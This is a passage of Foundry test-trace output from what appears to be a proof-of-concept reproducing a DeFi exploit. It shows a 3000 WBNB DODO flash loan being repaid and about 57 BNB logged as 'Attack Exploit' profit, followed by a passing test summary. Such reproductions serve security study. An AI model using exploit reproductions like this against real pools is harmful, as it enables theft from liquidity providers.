    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x3c60da1376f85a7f3c888682818856b0c611572c8d06dc51114a9951a6f90e17: 0x00000000000000000000000000000000000000000000000f4802b828af4c834d → 0x0000000000000000000000000000000000000000000000457dcc65ee8dec834d
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [3262] WBNB::transfer(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], 3000000000000000000000 [3e21])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], value: 3000000000000000000000 [3e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x000000000000000000000000000000000000000000000019a71d7672bfa1a26e → 0x0000000000000000000000000000000000000000000000bc487a7fc45b81a26e
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000a5b7e70633cd9d2893 → 0x0000000000000000000000000000000000000000000000031689fce231bd2893
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    │   │   └─ ← [Stop]
    │   ├─ [534] WBNB::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 3473210513056610755182 [3.473e21]
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 175452646497224035954003 [1.754e23]
    │   ├─ [534] WBNB::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 3473210513056610755182 [3.473e21]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 175452646497224035954003 [1.754e23]
    │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 3000000000000000000000 [3e21], : 0)
    │   ├─  storage changes:
    │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x000000000000000000000000000000000000000000000019a71d7672bfa1a26e → 0x0000000000000000000000000000000000000000000000bc487a7fc45b81a26e
    │   └─ ← [Stop]
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 56964339410199718035 [5.696e19]
    ├─ [534] WBNB::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 56964339410199718035 [5.696e19]
    ├─ [0] console::log("Attack Exploit: %s.%s BNB", 56, 964339410199718035 [9.643e17]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 31.34s (28.67s CPU time)

Ran 2 test suites in 32.46s (31.81s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
